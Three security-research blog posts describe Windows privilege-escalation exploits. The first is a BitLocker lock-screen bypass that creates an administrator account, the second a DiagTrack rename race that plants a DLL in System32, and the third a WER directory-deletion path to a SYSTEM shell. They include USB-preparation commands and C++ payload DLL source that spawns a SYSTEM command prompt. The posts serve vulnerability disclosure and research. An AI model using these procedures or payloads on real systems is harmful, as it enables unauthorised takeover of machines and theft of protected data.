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BitLocker Lockscreen bypass

By: Jonas L

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select β€œI have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password β€œhax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the β€œI have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose β€œOpen Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:


Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say β€œaccess denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press β€œI forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.


I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Windows Telemetry service elevation of privilege

By: Jonas L

Today, we will be looking at the β€œConnected User Experiences and Telemetry service,” also known as β€œdiagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as β€œAdvanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
      <EventProviderId Value="EventProvider_d1d93ef7" />

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:


This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

From directory deletion to SYSTEM shell

By: Jonas L

Vulnerabilities that enable an unprivileged profile to make a service (that is running in the SYSTEM security context) delete an arbitrary directory/file are not a rare occurrence. These vulnerabilities are mostly ignored by security researchers on the hunt as there is no established path to escalation of privilege using such a primitive technique. By chance I have found such a path using an unlikely quirk in the Windows Error Reporting Service. The technical details are neither brilliant nor novel, though a writeup has been requested by several Twitter users.

Windows Error Reporting Service (WER) is responsible for collecting telemetry data when an application crashes. Over time, many vulnerabilities have been discovered in WER and if you want to find a rare specimen, it is the first place to look for it. The service is split into a usermode component and service component that communicates via COM over ALPC. Error reports are created, queued, and delivered using the file system as temporary storage.

The files are stored in subfolders at C:\ProgramData\Microsoft\Windows\WER.

  • Temp is used to store collected crash data from various sources, before they’re merged into a single file.
  • ReportQueue is used when a report is ready for delivery to Microsoft’s servers. If delivery is not possible due to throttling or missing internet connection, delivery will be attempted later and delivered when conditions allow it.
  • ReportArchive is a historic archive of delivered reports.

The NTFS permissions for the folders are chosen to allow any crashing application to deliver its data to Microsoft. Crash-specific files and folders created in subfolders may have more restrictive permissions depending on the security context of the crashed application.

The default permissions for the root folder are:

C:\ProgramData\Microsoft\Windows\WER NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

And the subfolders:

C:\ProgramData\Microsoft\Windows\WER\ReportArchive BUILTIN\Administrators:(F)
                                                   NT AUTHORITY\SYSTEM:(F)
                                                   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                   NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\ReportQueue BUILTIN\Administrators:(F)
                                                 NT AUTHORITY\SYSTEM:(F)
                                                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                 NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\Temp BUILTIN\Administrators:(OI)(CI)(F)
                                          NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)

The root cause enabling an arbitrary privileged directory deletion to be used for escalation of privileges is a surprising logical flow in WER. If the root folder doesn’t exist when needed for report creation it will be created - nothing surprising here. What is surprising however, is that the folder is created with the following permissions:

C:\ProgramData\Microsoft\Windows\WER BUILTIN\Administrators:(OI)(CI)(F)
                                     NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)

The new permissions make it possible to make the root folder into a junction folder by an unprivileged profile. This is a scenario the service was not programmed to account for. However, even if we have a vulnerability that deletes the directory in SYSTEM security context, it would not help us much as the directory is not empty. Emptying the directory may immediately appear as impossible when the ReportArchive folder contains files owned by System with restrictive permissions, as it is often the case. But that is actually not a problem at all. What we need is the DELETE permission on the parent folder. The permissions on child files and folders are irrelevant.

A little known NTFS detail is that the rename operation can be used to move files and folders anywhere on the volume. A rename operation requires the DELETE permission on the origin and the FILE_ADD_FILE/FILE_ADD_SUBDIRECTORY permission on the destination folder. By moving all subfolders of C:\ProgramData\Microsoft\Windows\WER into another writeable location, such as C:\Windows\Temp, we bypass any restrictions on files inside the subfolders. Now the arbitrary directory delete vulnerability can be used on C:\ProgramData\Microsoft\Windows\WER with success. If the vulnerability only enables deletion of a file because NtCreateFile is called with FILE_NON_DIRECTORY_FILE, that restriction can be bypassed by making it open the path C:\ProgramData\Microsoft\Windows\WER::$INDEX_ALLOCATION.

When the folder is gone the next step is to make the WER service recreate it. That can be done by triggering the task \Microsoft\Windows\Windows Error Reporting\QueueReporting. The task is triggerable by an unprivileged profile, but executes as SYSTEM. After the task has completed we see the new, more permissive folder, but we also see the subfolders are recreated as well. To use our new FILE_WRITE_ATTRIBUTES permission on the recreated folder for making it into a junction folder, we must first make it empty (or not… but that is subject for another writeup). We repeat the move operations on the subdirectories as previously and now we can create our junction folder.

By having the junction point target the \??\c:\windows\system32\wermgr.exe.local folder, the error reporting service will create the target folder with the same permissive ACL. Every execution of wermgr.exe attempts to open the wermgr.exe.local folder, and if opened it will have the highest priority when locating β€˜Side By Side (SxS)’ DLL files. If the .local folder exists, the subfolder amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.778_none_e6c6b761130d4fb8 is then attempted to be opened, and if successful Comctl32.dll is loaded from it. By crafting a payload DLL and planting it in the amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.778_none_e6c6b761130d4fb8 folder with the name comctl32.dll, it will get loaded by the LoadLibrary function in the SYSTEM security context next time the WER service starts.

When a DLL file is loaded with LoadLibrary its DllMain function gets executed by the loading process with argument ul_reason_for_call having value DLL_PROCESS_ATTACH. Continued functionality of the loading process is not a priority in this scenario. We just want to detach from the process and execute code in our own process. By spawning a command prompt we can provide visual indication of successful execution. It also enables usage of the escalated privileges as the command prompt inherits the escalated privileges. Most importantly, it detaches execution from the error reporting service so the command prompt will continue running even if the service terminates!

There is an obstacle for launching the command prompt though. The service is running in session 0. Processes running in session 0 can not create objects on the desktop, only processes in session 1 (by default) can do that.

To launch the command prompt in the current active session we can retreive the active session number using the WTSGetActiveConsoleSessionId() function. Launching the prompt can be done with the following code:

bool spawnShell() 
   STARTUPINFO startInfo = { 0x00 };
   startInfo.cb = sizeof(startInfo);
   startInfo.wShowWindow = SW_SHOW;
   startInfo.lpDesktop = const_cast<wchar_t*>( L"WinSta0\\Default" );

   PROCESS_INFORMATION procInfo = { 0x00 };

   HANDLE hToken = {};
   DWORD  sessionId = WTSGetActiveConsoleSessionId();

   OpenProcessToken( GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken );
   DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, &hToken );

   SetTokenInformation(hToken, TokenSessionId, &sessionId, sizeof(sessionId));

   if (  CreateProcessAsUser( hToken,
            const_cast<wchar_t*>( L"" ),
      )  {

   return true;

The function opens the token of the current process (the service) and duplicates as a primary token (It already is, but we have to choose). The duplicated tokens session ID is then changed to the ID returned by WTSGetActiveConsoleSessionId(). By using the altered token to launch the command prompt, we get the security context of the service and execution in our session.

In my default payload, there are some extra things I like to do. Things that helps when the dll executes under more restrictive permissions. If the service is running as Local Service profile we do not have permission to change to the users session. Therefore I use the function WTSSendMessage() to create a dialog box on the active sessions desktop. That function works even when all other possibilities for creating anything on the desktop is impossible. The displayed data is also logged in the event viewer. I like to display the name of the profile we are executing as, the filename the dll is loaded as, and the the filename of the loading process. Sometimes a shell pops up because I planted a dll months before and by chance certain conditions are created where the dll gets loaded. In such cases that information is invalueable because, if the service terminates before I get a look at it, investigating why that shell popped is nearly impossible. I also like to make some beeps. Then even if everything is hidden because the computer is locked, I still get an indication that my payload executes and I can look in the event log.

One way to implement the mentioned functionality is:

#include <filesystem>   
#include <wtsapi32.h>
#include <Lmcons.h>
#include <iostream>
#include <string>
#include <Windows.h>
#include <wtsapi32.h>

#pragma comment(lib, "Wtsapi32.lib")

using namespace std;

wstring expandPath(const wchar_t* input) {
   wchar_t szEnvPath[MAX_PATH];
   ::ExpandEnvironmentStringsW(input, szEnvPath, MAX_PATH);
   return szEnvPath;

auto getUsername() {
   wchar_t usernamebuf[UNLEN + 1];
   DWORD size = UNLEN + 1;
   GetUserName((TCHAR*)usernamebuf, &size);
   static auto username = wstring{ usernamebuf };
   return username;

auto getProcessFilename() {
   wchar_t process_filenamebuf[MAX_PATH]{ 0x0000 };
   GetModuleFileName(0, process_filenamebuf, MAX_PATH);
   static auto process_filename = wstring{ process_filenamebuf };
   return process_filename;

auto getModuleFilename(HMODULE hModule = nullptr) {
   wchar_t module_filenamebuf[MAX_PATH]{ 0x0000 };
   if(hModule != nullptr) GetModuleFileName(hModule, module_filenamebuf, MAX_PATH);
   static auto module_filename = wstring{ module_filenamebuf };
   return module_filename;

bool showMessage() {
   Beep( 4000, 400 );
   Beep( 4000, 400 );
   Beep( 4000, 400 );

   auto m = L"This file:\n"s + getModuleFilename() + L"\nwas loaded by:\n"s + getProcessFilename() + L"\nrunning as:\n" + getUsername() ;
   auto message = (wchar_t*)m.c_str();
   DWORD messageAnswer{};
   WTSSendMessage( WTS_CURRENT_SERVER_HANDLE, WTSGetActiveConsoleSessionId(), (wchar_t*)L"",0 ,message ,lstrlenW(message) * 2,0 ,0 ,&messageAnswer ,true );

   return true;
static const auto init = spawnShell();
BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved )
   static auto const msgshown = showMessage();

Final execution of the exploit with payload should end up looking like this:

An alternative to using the scheduled task for triggering the report submission flow is to submit an error report using the exported C function in wer.dll. If the report is submitted with the WER_SUBMIT_OUTOFPROCESS flag, the service will handle the operations needed for our purposes instead of the usermode component. Source code for submitting an error report can be seen here
